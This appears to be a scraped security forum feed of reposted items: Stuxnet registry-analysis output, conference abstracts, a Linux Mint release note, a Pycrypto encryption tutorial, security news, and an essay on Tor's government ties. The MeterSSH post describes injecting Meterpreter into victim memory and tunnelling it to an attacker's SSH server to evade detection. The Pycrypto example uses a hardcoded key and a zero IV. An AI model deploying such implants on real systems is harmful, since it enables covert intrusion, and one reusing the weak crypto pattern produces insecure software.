HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\6\0\MRUListEx: FF FF FF FF HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\7\MRUListEx: 00 00 00 00 01 00 00 00 FF FF FF FF HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\7\MRUListEx: 01 00 00 00 00 00 00 00 FF FF FF FF HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\27\Shell\ItemPos1280x720(1): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 00 00 00 4E 00 31 00 00 00 00 00 6C 45 23 70 10 00 4C 4F 54 53 4F 46 7E 31 00 00 36 00 03 00 04 00 EF BE 6C 45 3C 6C 6C 45 23 70 14 00 00 00 4C 00 6F 00 74 00 73 00 20 00 6F 00 66 00 20 00 53 00 74 00 75 00 78 00 6E 00 65 00 74 00 00 00 18 00 DC 00 00 00 02 00 00 00 34 00 31 00 00 00 00 00 6C 45 51 6C 10 00 54 44 4C 34 00 00 20 00 03 00 04 00 EF BE 6C 45 4F 6C 6C 45 51 6C 14 00 00 00 54 00 44 00 4C 00 34 00 00 00 14 00 DC 00 00 00 02 00 00 00 00 00 00 00 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\27\Shell\ItemPos1280x720(1): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 00 00 00 4E 00 31 00 00 00 00 00 6C 45 E9 6C 10 00 4C 4F 54 53 4F 46 7E 31 00 00 36 00 03 00 04 00 EF BE 6C 45 3C 6C 6C 45 E9 6C 14 00 00 00 4C 00 6F 00 74 00 73 00 20 00 6F 00 66 00 20 00 53 00 74 00 75 00 78 00 6E 00 65 00 74 00 00 00 18 00 DC 00 00 00 02 00 00 00 34 00 31 00 00 00 00 00 6C 45 51 6C 10 00 54 44 4C 34 00 00 20 00 03 00 04 00 EF BE 6C 45 4F 6C 6C 45 51 6C 14 00 00 00 54 00 44 00 4C 00 34 00 00 00 14 00 DC 00 00 00 02 00 00 00 00 00 00 00 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\29\Shell\WinPos1280x720(1).left: 0x00000049 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\29\Shell\WinPos1280x720(1).left: 0x0000002C HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\29\Shell\WinPos1280x720(1).top: 0x00000057 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\29\Shell\WinPos1280x720(1).top: 0x0000003A HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\29\Shell\WinPos1280x720(1).right: 0x00000369 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\29\Shell\WinPos1280x720(1).right: 0x0000034C HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\29\Shell\WinPos1280x720(1).bottom: 0x000002AF HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\29\Shell\WinPos1280x720(1).bottom: 0x00000292 HKU\S-1-5-21-515967899-1935655697-682003330-1003\SessionInformation\ProgramCount: 0x00000002 HKU\S-1-5-21-515967899-1935655697-682003330-1003\SessionInformation\ProgramCount: 0x00000001 ---------------------------------- Total changes: 150 ---------------------------------- 23 deleted keys, 110 values deleted, 17 values modified. Total = 150 changes. Overall, there's a lot to this rootkit. I didn't go into the MRxCls configuration file decryption, network changes/attack methods, other methods of zero-day flaws, etc but even so you can see that this is a pretty sophisticated piece of malware. However, as we now see, its biggest downfall was its complete lack of protection. The only personal explanation I have for this is that the creator(s) were either rushed to get it done by 'x' timeframe, so they focused on main code more than obfuscation, or they just imagined it wouldn't ever escape its original intended environment, so they'd never have to worry about reverse engineering being an issue. References Stuxnet Under the Microscope. Analyzing a Stuxnet Infection with the Sysinternals Tools. Posted by Patrick Barker at 2:58 PM Sursa: Debugging and reverse engineering: Stuxnet - User/Kernel-Mode analysis

Nu stiu ce ai descarcat. Descarca asta: https://github.com/athre0z/ida-skins/releases/tag/v1.3.0 (release) Si pune: - ce e in /plugins in /plugins - folderul /skin in folderul principal ida (unde e si /plugins) Rezultat: http://i.imgur.com/eWuQArb.png

[h=1]Runtime Manipulation of Android and iOS Applications - OWASP AppSecUSA 2014[/h] Publicat pe 30 sept. 2014 Recorded at AppSecUSA 2014 in Denver AppSec USA 2014 - AppSec USA 2014 Thursday, September 18 • 2:00pm - 2:45pm Runtime Manipulation of Android and iOS Applications With over 1.6 million applications in the Apple AppStore and Google Play store, and around 7 billion mobile subscribers in the world, mobile application security has been shoved into the forefront of many organizations. Mobile application security encompasses many facets of security. Device security, application security, and network security all play an important role in the overall security posture of a mobile application. Part of being a pen tester of mobile applications is understanding how each of the security controls work and how they interact. One powerful way to test the security and controls of our applications is to utilize runtime analysis and manipulation. Many tools exist to manipulate how an application works, both iOS and Android. This hands-on skills course will help students learn how to improve their mobile security toolbox. The skills course will utilize tools such as cycript, snoop-it, jdb, etc for runtime manipulation and memory analysis. After the course, students will be able to get better results from their mobile application security testing. Speakers Dan Amodio Principal Consultant, Aspect Security As a Principal Consultant, Dan manages and defines Aspect Security's line of Assessment Services-- helping organizations quantify their security risks from design to implementation. He works with staff and clients to develop the team members and deliverables. David Lindner Managing Consultant and Global Practice Manager, Aspect Security David Lindner, a Managing Consultant and Global Practice Manager, Mobile Application Security Services at Aspect Security. David brings 15 years of IT experience including application development, network architecture design and support, IT security and consulting, and application security. David's focus has been in the mobile space including everything from mobile application penetration testing/code review, to analyzing MDM and BYOD solutions. - Managed by the official OWASP Media Project https://www.owasp.org/index.php/OWASP... Sursa:

[h=1]Use After Free Exploitation - OWASP AppSecUSA 2014[/h] Publicat pe 30 sept. 2014 Recorded at AppSecUSA 2014 in Denver AppSec USA 2014 - AppSec USA 2014 Thursday, September 18 • 10:30am - 11:15am Use After Free Exploitation Use After Free vulnerabilities are the cause of a large number of web browser and client-side compromises. Software bugs residing on the heap can be difficult to detect through standard debugging and QA. This presentation will first define the Use After Free vulnerability class, and then dive deep into detecting the bug in a debugger and weaponizing it into a working exploit against Internet Explorer. We will also cover the concept of memory leaks which can allow for a complete Address Space Layout Randomization (ASLR) bypass. Speakers Stephen Sims Consultant Stephen Sims is an industry expert with over 15 years of experience in information technology and security. Stephen currently works out of San Francisco as a consultant performing reverse engineering, exploit development, threat modeling, and penetration testing. Stephen has an MS in information assurance from Norwich University and is a course author and senior instructor for the SANS Institute.

[h=2]Linux Mint 17.1 “Rebecca” MATE RC released![/h] The team is proud to announce the release of Linux Mint 17.1 “Rebecca” MATE RC. Linux Mint 17.1 Rebecca MATE Edition Linux Mint 17.1 is a long term support release which will be supported until 2019. It comes with updated software and brings refinements and many new features to make your desktop even more comfortable to use. New features at a glance: Out of the box support for Compiz Update Manager Language Settings Login Screen System Improvements Artwork Improvements Other Improvements Main Components LTS Strategy For a complete overview and to see screenshots of the new features, visit: “What’s new in Linux Mint 17.1 MATE“. Important info: Issues with Skype DVD Playback with VLC Bluetooth EFI Support Solving freezes with some NVIDIA GeForce GPUs Booting with non-PAE CPUs Other issues Make sure to read the “Release Notes” to be aware of important info or known issues related to this release. System requirements: x86 processor (Linux Mint 64-bit requires a 64-bit processor. Linux Mint 32-bit works on both 32-bit and 64-bit processors). 512 MB RAM (1GB recommended for a comfortable usage). 5 GB of disk space (20GB recommended). Graphics card capable of 800×600 resolution (1024×768 recommended). CD/DVD drive or USB port Bug reports: Please report bugs below in the comment section of this blog. Please visit https://github.com/linuxmint/Roadmap to follow the progress of the development team between the RC and the stable release. Download: Md5 sum: 32-bit: a6f43b493cdec449e3232317f2b6e301 64-bit: 0609ad34999d7cae3d3689b9390fc05b Torrents: 32-bit 64-bit HTTP Mirrors for the 32-bit DVD ISO: Argentina Xfree Australia AARNet Australia Internode Australia uberglobal Australia Western Australian Internet Association Austria Goodie Domain Service Bangladesh dhakaCom Limited Bangladesh IS Pros Limited Belarus ByFly Belgium Cu.be Solutions Brazil Universidade Federal do Parana Bulgaria Telepoint Canada University of Waterloo Computer Science Club China Qiming College of Huazhong University of Science and Technology China University of Science and Technology of China Linux User Group Colombia EDATEL Czech Republic CZ.NIC Czech Republic Ignum, s.r.o. Czech Republic UPC Ceska republika Denmark iODC Ecuador CEDIA France Crifo.org France finn.lu France Gwendal Le Bihan France IRCAM France Ordimatic Germany Artfiles Germany FH Aachen Germany Friedrich-Alexander-University of Erlangen-Nuremberg Germany GWDG Germany Hochschule Esslingen University of Applied Sciences Germany NetCologne GmbH Greece Hellenic Telecommunications Organization Greece National Technical University of Athens Greece University of Crete Greenland Tele Greenland Iceland Siminn hf Indonesia Jaran.undip Ireland HEAnet Israel Israel Internet Association Italy GARR Kazakhstan Neolabs Luxembourg root S.A. Netherlands NLUUG Netherlands Triple IT New Caledonia OFFRATEL LAGOON New Zealand University of Canterbury New Zealand Xnet Philippines PREGINET Poland ICM – University of Warsaw Poland Piotrkosoft Poland Polish Telecom Portugal Universidade do Porto Romania ServerHost Russia Yandex Team Serbia University of Kragujevac Singapore NUS – School of Computing – SigLabs Slovakia Rainside South Africa University of Free State South Africa Web Africa South Korea KAIST South Korea NeowizGames corp Spain Oficina de Software Libre do Cixug Sweden DF – Computer Society at Lund University Sweden Portlane Switzerland SWITCH Taiwan NCHC Taiwan Southern Taiwan University of Science and Technology Taiwan TamKang University Taiwan Yuan Ze University, Department of Computer Science and Engineering United Kingdom Bytemark Hosting United Kingdom University of Kent UK Mirror Service USA Advanced Network Computing Lab at the University of Hawaii USA advancedhosters.com USA Go-Parts USA James Madison University USA kernel.org USA MetroCast Cablevision USA Mirror.pw USA mirrorcatalogs.com USA Nexcess USA Secution, LLC. USA Team Cymru USA University of Oklahoma USA US Internet USA XMission Internet Vietnam FPT Telecom HTTP Mirrors for the 64-bit DVD ISO: Argentina Xfree Australia AARNet Australia Internode Australia uberglobal Australia Western Australian Internet Association Austria Goodie Domain Service Bangladesh dhakaCom Limited Bangladesh IS Pros Limited Belarus ByFly Belgium Cu.be Solutions Brazil Universidade Federal do Parana Bulgaria Telepoint Canada University of Waterloo Computer Science Club China Qiming College of Huazhong University of Science and Technology China University of Science and Technology of China Linux User Group Colombia EDATEL Czech Republic CZ.NIC Czech Republic Ignum, s.r.o. Czech Republic UPC Ceska republika Denmark iODC Ecuador CEDIA France Crifo.org France finn.lu France Gwendal Le Bihan France IRCAM France Ordimatic Germany Artfiles Germany FH Aachen Germany Friedrich-Alexander-University of Erlangen-Nuremberg Germany GWDG Germany Hochschule Esslingen University of Applied Sciences Germany NetCologne GmbH Greece Hellenic Telecommunications Organization Greece National Technical University of Athens Greece University of Crete Greenland Tele Greenland Iceland Siminn hf Indonesia Jaran.undip Ireland HEAnet Israel Israel Internet Association Italy GARR Kazakhstan Neolabs Luxembourg root S.A. Netherlands NLUUG Netherlands Triple IT New Caledonia OFFRATEL LAGOON New Zealand University of Canterbury New Zealand Xnet Philippines PREGINET Poland ICM – University of Warsaw Poland Piotrkosoft Poland Polish Telecom Portugal Universidade do Porto Romania ServerHost Russia Yandex Team Serbia University of Kragujevac Singapore NUS – School of Computing – SigLabs Slovakia Rainside South Africa University of Free State South Africa Web Africa South Korea KAIST South Korea NeowizGames corp Spain Oficina de Software Libre do Cixug Sweden DF – Computer Society at Lund University Sweden Portlane Switzerland SWITCH Taiwan NCHC Taiwan Southern Taiwan University of Science and Technology Taiwan TamKang University Taiwan Yuan Ze University, Department of Computer Science and Engineering United Kingdom Bytemark Hosting United Kingdom University of Kent UK Mirror Service USA Advanced Network Computing Lab at the University of Hawaii USA advancedhosters.com USA Go-Parts USA James Madison University USA kernel.org USA MetroCast Cablevision USA Mirror.pw USA mirrorcatalogs.com USA Nexcess USA Secution, LLC. USA Team Cymru USA University of Oklahoma USA US Internet USA XMission Internet Vietnam FPT Telecom Enjoy! We look forward to receiving your feedback. Thank you for using Linux Mint and have a lot of fun testing the release candidate! Sursa: The Linux Mint Blog » Blog Archive » Linux Mint 17.1 “Rebecca” MATE RC released!

Encrypting files with Pycrypto Pycrypto is the python cryptography toolkit you'll ever need. It supports pretty much everything, it's rather fast and has an understandable interface and documentation. Cryptography, in itself, is rather complicated and hard to understand and implement, and so is the documentation on encrypting files with pycrypto (or pretty much any crypto toolkit/library in the world). Recently, I was tasked with writing a code that will encrypt files to be decrypted on a mobile platform - Android and iOS. Both of their documentations are lacking in that department. You can easily find a snippet so that you can encrypt and decrypt a file on the same device, but not something that will work cross-device/cross-platform. That's because some of the details of the encryption algorithms are not mentioned and those are crucial. ELI5 AES AES is a block cypher. That means, it encrypts/decrypts in blocks of 128 bits. The key used for the [en|de]cryption is 128, 192 or 256 bits. So, this means that your data has to be divisible by 128bits and your key must be 128, 192 or 256 bits. Pretty tough to meet these requirements considering we're dealing with binary/text files that will be some random length? Well, that's where padding comes in. In order to make the file's length divisible by 128b(16B) we have to pad it. The most used padding scheme is PKCS7 Simply append n < 16 bytes to the file with value n to meet the 16B block size. So, the workflow now would be, pad -> encrypt -> decrypt -> unpad. There's one more thing - IV - Should also be 16B. It's a common practice to have this at random, prepend it to the file on every encryption. We'll assume a static IV now for the sake of simplicity. The documentations around the net don't mention the IV. Then, the crypto system creates it per device, and you'll be stuck wondering how you can decrypt on your phone but not your desktop. Enter AES256/CBC/PKCS7 This is the cookie cutter scheme for encryption. It's supported by the mobile OS-es and libraries, it's even the default! Doing this with openssl is easy: # To Encrypt openssl enc -aes-256-cbc -k LyoNIpj8nqg5tcukqmW3kJ7PIbHtfeHE -iv 0000000000000000 -in in_file -out out_file # To Decrypt openssl enc -d -aes-256-cbc -k LyoNIpj8nqg5tcukqmW3kJ7PIbHtfeHE -iv 0000000000000000 -in in_file -out out_file In this example, the key is set to LyoNIpj8nqg5tcukqmW3kJ7PIbHtfeHE (32B/256b) and the IV is set to 16B of zeroes. Openssl pads with PKCS7 by default. Now let's see the example with pycrypto. Assuming with have in_file and out_file already opened: # initialize the encryption encryption_key = "LyoNIpj8nqg5tcukqmW3kJ7PIbHtfeHE" iv = 16 * '\x00' crypt = AES.new(encryption_key, AES.MODE_CBC, iv) # keep chunk size large for speed but divisible by 16B chunksize = 1024 while True: chunk = infile.read(chunksize) if len(chunk) == 0: # it's an empty chunk. We don't need it. break elif len(chunk) == chunksize: # We've read a full encryptable chunk with length divisible by 16B out_file.write(crypt.encrypt(chunk)) else: # We've read a chunk that's not divisible by 16B. We PCKS7 pad it. # First calculate how many bytes we'll need to pad it padding_bytes = 16 - len(chunk) % AES.block_size # Next, create the padding sequence padding = StringIO.StringIO() for _ in xrange(padding_bytes): # If we're missing 4 bytes, the padding sequence would be 04 04 04 04 (hex). That's why the formatting. padding.write('%02x' % padding_bytes) padded_chunk = chunk + binascii.unhexlify(padding.getvalue()) out_file.write(crypt.encrypt(padded_chunk)) That's it. This should be decryptable with openssl, android crypto, ios crypto library and any device. Just need to know the encryption scheme, the IV and the encryption key. If you really want to make something secure, I suggest you think about making a random IV each time the function is called. Sursa: Encrypting files with Pycrypto

[h=1]Chainfire Releases CF-Auto-Roots For Nexus Line[/h] Posted November 15, 2014 at 11:09 am by jerdog Benjamin Franklin, the US Statesman from simpler times, gave the famous quote in 1789 that “…in this world nothing can be said to be certain, except death and taxes.” I can’t fault him for not having the forethought to identify that there would be a few more certainties in life, and those would be “Chainfire releasing root for Nexus devices and providing analysis of the state of root on a new Google release.” For those not familiar, XDA Senior Recognized Developer Chainfire has become the preeminent source for information related to root on Android devices as well as analysis of how Google is changing system security on their new Android OS updates. His Google+ posts are often waited on with anticipation rivaling the title of the next Star Wars installment. Ok, so maybe that’s a bit of a stretch – there weren’t any Watch Parties for the Star Wars announcement. With that being said, he recently updated his CF-Auto-Root downloads to include Android 5.0 root for all of the Nexus line: Nexus 4, Nexus 5, Nexus 7 2012, Nexus 7 2013, Nexus 9, and Nexus 10. A few of the key things changed for this release are: The new variants of CFAR have the SuperSU ZIP embedded A second included ZIP (if on Lollipop or newer) patches the current kernel to run SuperSU at boot Current CFARs have SuperSU v2.20 which is not currently available elsewhere and only has CFAR compatibility For more information, make sure you check out the CFAR thread and his G+ stream to stay current on all Lollipop-related news. Sursa: Chainfire Releases CF-Auto-Roots For Nexus Line - XDA Forums

81% of Tor users can be de-anonymised by analysing router information, research indicates Martin Anderson, The Stack Friday 14 November, 2014 Research undertaken between 2008 and 2014 suggests that more than 81% of Tor clients can be ‘de-anonymised’ – their originating IP addresses revealed – by exploiting the ‘Netflow’ technology that Cisco has built into its router protocols, and similar traffic analysis software running by default in the hardware of other manufacturers. Professor Sambuddho Chakravarty, a former researcher at Columbia University’s Network Security Lab and now researching Network Anonymity and Privacy at the Indraprastha Institute of Information Technology in Delhi, has co-published a series of papers over the last six years outlining the attack vector, and claims a 100% ‘decloaking’ success rate under laboratory conditions, and 81.4% in the actual wilds of the Tor network. Chakravarty’s technique [PDF] involves introducing disturbances in the highly-regulated environs of Onion Router protocols using a modified public Tor server running on Linux - hosted at the time at Columbia University. His work on large-scale traffic analysis attacks in the Tor environment has convinced him that a well-resourced organisation could achieve an extremely high capacity to de-anonymise Tor traffic on an ad hoc basis – but also that one would not necessarily need the resources of a nation state to do so, stating that a single AS (Autonomous System) could monitor more than 39% of randomly-generated Tor circuits. Chakravarty says: “…it is not even essential to be a global adversary to launch such traffic analysis attacks. A powerful, yet non- global adversary could use traffic analysis methods […] to determine the various relays participating in a Tor circuit and directly monitor the traffic entering the entry node of the victim connection,” The technique depends on injecting a repeating traffic pattern – such as HTML files, the same kind of traffic of which most Tor browsing consists – into the TCP connection that it sees originating in the target exit node, and then comparing the server’s exit traffic for the Tor clients, as derived from the router’s flow records, to facilitate client identification. Tor is susceptible to this kind of traffic analysis because it was designed for low-latency. Chakravarty explains: “To achieve acceptable quality of service, [Tor attempts] to preserve packet interarrival characteristics, such as inter-packet delay. Consequently, a powerful adversary can mount traffic analysis attacks by observing similar traffic patterns at various points of the network, linking together otherwise unrelated network connections.” The online section of the research involved identifying ‘victim’ clients in Planetlab locations in Texas, Belgium and Greece, and exercised a variety of techniques and configurations, some involving control of entry and exit nodes, and others which achieved considerable success by only controlling one end or the other. Traffic analysis of this kind does not involve the enormous expense and infrastructural effort that the NSA put into their FoxAcid Tor redirects, but it benefits from running one or more high-bandwidth, high-performance, high-uptime Tor relays. The forensic interest in quite how international cybercrime initiative ‘Operation Onymous’ defied Tor’s obfuscating protocols to expose hundreds of ‘dark net’ sites, including infamous online drug warehouse Silk Road 2.0, has led many to conclude that the core approach to deanonymisation of Tor clients depends upon becoming a ‘relay of choice’ – and a default resource when Tor-directed DDOS attacks put ‘amateur’ servers out of service. Sursa: 81% of Tor users can be de-anonymised by analysing router information, research indicates

Nexus 5, Galaxy S5 and iPhone 5s hacked at Pwn2Own event The Samsung Galaxy S5, Apple iPhone 5s and Google Nexus 5 were amongst handsets to be successfully hacked during the Mobile Pwn2Own hacking competition, reports Forbes. The event is an annual competition which offers cash prizes to those that can reveal security weaknesses in handsets. Sponsored by BlackBerry and Google Android, the event offered a total prize pool of $425,000 to those who could hack the handsets, and prizes were offered pretty quickly as just one day into the two-day event, the iPhone 5s, Samsung Galaxy S5, Nexus 5 and Amazon Fire Phone were all successfully hacked. International Business Times has some more details on the hacks of each handset. It reports that the iPhone 5s fell to “a combination of two vulnerabilities” which allowed the attackers to to hack it via the Safari browser, achieving a ‘full sandbox escape.’ The Samsung Galaxy S5 and Google Nexus 5, on the other hand, both fell foul to exploits using the NFC chip – this wasn’t an option in the iPhone 5s, which does not have one, though the recently released iPhone 6 has introduced the chip for the first time. The Amazon Fire Phone, which runs a customized version of Android, fell “using a combination of three separate vulnerabilities”. Bad news for iOS and Android phones then, but what of Windows Phone? Well, according to Ars Technica, a single hacker attempted to take on the Lumia 1520, but was rebuffed. The hacker was apparently “able to exfiltrate the cookie database”, but “unable to gain full control of the system.” HP, that runs the event as part of its Zero Day Initiative, will release more detail on the nature of the hacks once the companies have had time to patch the vulnerabilities. Bloomua / Shutterstock.com Author Editor, ESET Sursa: Nexus 5, Galaxy S5 and iPhone 5s hacked at Pwn2Own event

MeterSSH – Meterpreter over SSH As penetration testers, it’s crucial to identify what types of attacks are detected and what’s not. After running into a recent penetration test with a next generation firewall, most analysis has shifted away from the endpoints and more towards network analysis. While there needs to be a mixture of both, MeterSSH demonstrates how easy it is to circumvent a lot of these signature based “next generation” product lines. MeterSSH is an easy way to inject native shellcode into memory and pipe anything over SSH to the attacker machine through an SSH tunnel and all self contained into one single Python file. Python can easily be converted to an executable using pyinstaller or py2exe. MeterSSH is easy – simply edit the meterssh.py file and add your SSH server IP, port, username, and password and run the script. It will spawn meterpreter through memory injection (in this case a windows/meterpreter/bind_tcp) and bind to port 8021. Paramiko (python SSH module) is used to tunnel meterpreter over 8021 and back to the attacker and all communications tucked within that SSH tunnel. Here we launch our initial meterssh payload: Next we launch monitor.py which monitors or the SSH connection and automatically launches Metasploit for you. Once it detects the SSH connection and shell, it kicks off Metasploit for you: Next, Metasploit is launched and notice that we are tunneling through localhost to the victim machine. There are two files, monitor.py and meterssh.py. monitor.py – run this in order to listen for an SSH connection, it will poll for 8021 on localhost for an SSH tunnel then spawn Metasploit for you automatically to grab the shell. meterssh.py – this is what you would deploy to the victim machine – note that most windows machines wont have Python installed, its recommended to compile Python with py2exe or pyinstaller. Fields you need to edit inside meterssh.py user = “sshuser” # password for SSH password = “sshpw” # this is where your SSH server is running rhost = “192.168.1.1” # remote SSH port – this is the attackers SSH server port = “22” user – this is the user account for the attackers SSH server (do not use root, does not need root) password – this is the password for the attackers SSH server rhost – this is the attackers SSH server IP address port – this is the attackers SSH server port Note that you DO NOT need to change the Metasploit shellcode, the Metasploit shellcode is simply an unmodified windows/meterpreter/bind_tcp that binds to port 8021. If you want to change this, just switch the shellcode out and change port 8021 inside the script to bind to whatever port you want to. You do not need to do this however unless you want to customize/modify. You can download meterssh from our github page: Download MeterSSH from Github By davek|November 14th, 2014 Sursa: https://www.trustedsec.com/november-2014/meterssh-meterpreter-ssh/

+22: x64 binary ? x86 Hex-Rays Plus22 transforms x86_64 executables to be processed with 32-bit version of Hex-Rays Decompiler. This tool was created in mid-2013 for internal use in More Smoked Leet Chicken, and made public in November 2014 when Hex-Rays x64 finally came out. Usage php plus22.php [-va] {x64_binary.bin or listing.asm} If file name ends with '.asm', it will be interpreted as an ASM listing. Otherwise, it will be interpreted as x64 ELF/PE, and disassembled with IDA. -v be verbose and leave all temporary files -a AutoNop all lines with errors You can use _misc\php.exe to run the script. Plus22 is designed to run in Windows environment, and works well under Wine. Specifying your IDA path To decompile and restore types automatically, Plus22 needs to know where IDA is installed. You can add your path to $idaPaths array right at the top of script, or have it done for you automatically when Plus22 needs your IDA installation path. Without specifying IDA path, you can do the following by hand: Load binary in IDA64 View ? Unhide all (uncollapse functions) File ? Produce file ? Create ASM file php plus22.php mega_binary.asm If you're lucky, .obj is created. Load .obj in IDA File ? Script file... — execute mega_binary+22.idc for correct function types Files _misc\php.exe — compatible PHP version from PHP For Windows: _misc\original_instructions.idc — IDA script to manually load original instruction toggler _misc\functype.db — imported functions type database, parsed from IDA TIL collection _misc\jwasm.exe — fast Masm-like assembler from JWasm | SourceForge.net _misc\exporter.idc — ASM listing export helper IDA script _example\ — Network 300 from ebCTF 2013 Teaser processed with Plus22. This x64 binary uses raw socket API and heavily utilizes BN_* functions from OpenSSL. Changelog v0.3 [+] error correction mode: allows to fix ASM source interactively and re-compile right in +22 [+] '-a' command line switch: auto-nop all errors without user interaction v0.2.3 [+] type matching for float calling convention (XMM registers) [+] type guessing support for XMM [+] automatic 64-bit -> 32-bit constant truncation v0.2.2 [-] removed collapsed function handling [+] press Alt-Z to toggle between converted and original x64 instructions v0.2.1 [+] changeable calling convention: now supports windows x64 binaries [+] automatic main() detection [.] more compatible data types [.] variadic arguments expansion v0.2 [+] type matching for imports [+] type guessing for internal functions [+] fully automatic ELF disassembly v0.1.1 [+] clip_type_helper: automatic calling convention converter [.] more automatic patches v0.1 [+] directive and instruction patches [+] being able to build an x86 binary [.] collapsed function emulation Sursa: https://github.com/v0s/plus22

A VMware Guest to Host Escape Story Kostya Kortchinsky Immunity, Inc. BlackHat USA 2009, Las Vegas Why deviices? ? I don't have enough lowlevel system Mojo ? ? They are common to all VMware products ? They “run” on the Host – vmwarevmx process ? They can be accessed from the guest – Through Port I/O or memorymapped I/O ? They are written in C/C++ ? They sometimes parse some complex data! Download: http://www.blackhat.com/presentations/bh-usa-09/KORTCHINSKY/BHUSA09-Kortchinsky-Cloudburst-SLIDES.pdf

How leading Tor developers and advocates tried to smear me after I reported their US Government ties By Yasha Levine On November 14, 2014 “I contract for the United States Government to build anonymity technology for them and deploy it.” — Roger Dingledine, cofounder of Tor, 2004 * * * About three months ago, I published an article exploring the deeply conflicted ties between agencies of the U.S. National Security State, and the Tor Network—an online anonymity tool popular among anti-surveillance privacy groups and activists, including Edward Snowden. My article traced the history of Tor and the US military-intelligence apparatus that spawned it—from Tor’s initial development by military researchers in the mid-1990s at the US Naval Laboratory in Washington DC, through its quasi-independent period after it was spun off as a nonprofit in 2004 but continued to receive most of its funding from a variety of government branches: Pentagon, State Department, USAID, Radio Free Asia. My article also revealed that Tor was created not to protect the public from government surveillance, but rather, to cloak the online identity of intelligence agents as they snooped on areas of interest. But in order to do that, Tor had to be released to the public and used by as diverse a group of people as possible: activists, dissidents, journalists, paranoiacs, kiddie porn scum, criminals and even would-be terrorists — the bigger and weirder the crowd, the easier it would be for agents to mix in and hide in plain sight. Finally, I pointed out that Tor was not nearly as secure as many of its proponents claimed. For people with really something to hide from the state, Tor very likely offered the opposite of anonymity: it singled out users for total NSA surveillance, with intel agencies potentially sucking up and recording everything they did online. Recent events have proven yet again that Tor is not as secure as its fans claim, or as its own developers say they hoped. All of this information is public, and it’s been out there for quite a while—but mostly in a scattered and fragmented way. As a result, the full story of Tor’s many pitfalls and contradictions has never been widely known by the public. So even people who should know better, and who care about this issue, have been promoting Tor as a grassroots anti-government surveillance tool without questioning or double-checking that story. When people are told about Tor’s roots in intelligence, and its ongoing funding from the Pentagon, they are usually shocked and surprised. So was I. The Tor story needed to be revisited, which I did, assembling all the verifiable facts, tax and financial records; public statements by Tor’s inventors and developers; published academic papers, and so on. Before publishing, we at Pando reached out multiple times to several key Tor people for comment; editors meticulously fact-checked the article before putting it up. One would’ve thought that an article warning about Tor’s little-known dangers and conflicts-of-interest would’ve been greeted by the privacy and anonymity community—that they would be more interested in protecting the public and getting Tor right, than in protecting Tor’s brand. But instead of being welcomed by the privacy community or sparking a discussion about the aspects of Tor that have been swept under the rug, the article was met with a smear campaign. Surprisingly, the smears weren’t waged by the usual fringe anonymous-troll types, but rather by some of the most prominent privacy and anti-surveillance names in the country—top people from groups like the ACLU, Electronic Frontier Foundation, Freedom of the Press Foundation, and Pierre Omidyar’s First Look Media. Curiously, not a single one of these critics disputed the facts in the story. There wasn’t a single factual error they could point to; so instead, they took to a range of familiar PR smear tactics—tactics one usually sees used by oil company PR flacks, but not by privacy hacktivists. First, they flooded social media telling anyone who showed interest in my article that they should ignore it; then when that didn’t work and the article caught fire, they tried to discredit it with crude insults, misdirection, and outright lies, even going as far as to claim that I’m funded by the CIA. From my experience, when your article produces bizarre hostile reactions like this it means you’ve hit on something important. Take Tor developer Andrea Shepard. As soon as my story went live, Shepard responded with a torrent of childish insults, calling me “Pandofilth” and “Yasha the Foul,” a “statist propagandist,” a “fucktard’s fucktard.” Shepard accused me of being funded by spooks, and ranted on and on about the various ways in which she said I had performed sexual favors for a male colleague. She hurled similar childish abuse at anyone she caught commenting positively about my article. When readers suggested to Shepard that she should instead offer a point-by-point rebuttal of my article, rather that swearing and insulting at anyone who mentioned it, she responded that my article wasn’t worth the effort of rebutting (only insulting), and that I don’t deserve to live: @Raed667 @headhntr Yasha Levine doesn’t merit that kind of effort. Frankly, he doesn’t merit *oxygen*. — Andre? (@puellavulnerata) July 18, 2014 Jacob Appelbaum, another Tor developer who crisscrosses the globe promoting it as a tool against government surveillance, had refused my multiple requests for comment when I was working on the article. When it was published, he called my reporting “a bunch of bullshit”, but refused to elaborate with a substantive rebuttal. Instead, Appelbaum made vague suggestions that I was driven by dark and mysterious motives: @gbelljnr I don’t. I don’t have time for jerks who use that nonsense to service their other agenda. Boring waste of time. — Jacob Appelbaum (@ioerror) October 26, 2014 Perhaps it’s somewhat understandable that salaried Tor developers like Andrea Shepard and Jacob Appelbaum went on the attack. Shepard is a libertarian (which is why she called me “statist”—a harsh epithet in her libertarian world); Appelbaum is a bit of a celebrity in the anti-surveillance community, having helped set up Wikileaks, and lately being constantly profiled as a rebel-fugitive hiding out in Berlin from his NSA pursuers. Both Appelbaum and Shepard circulate in radical anti-police state circles, and my article pointed out that they earn $100,000-plus annual salaries working for a nonprofit federal government security contractor—a nonprofit that gets at least three-quarters of its annual funding from the Pentagon, State Department, and other federal agencies. In other words, Tor anti-National Security State rebels are living off the largesse of their NatSec State nemesis. But it wasn’t only Tor employees who were determined to discredit my reporting. Take Jillian York, “Director for International Freedom of Expression” at the Electronic Frontier Foundation, a tech industry lobby group funded by Silicon Valley’s largest corporations. As soon as the story came out, she counseled her 45,000 followers to ignore my story: 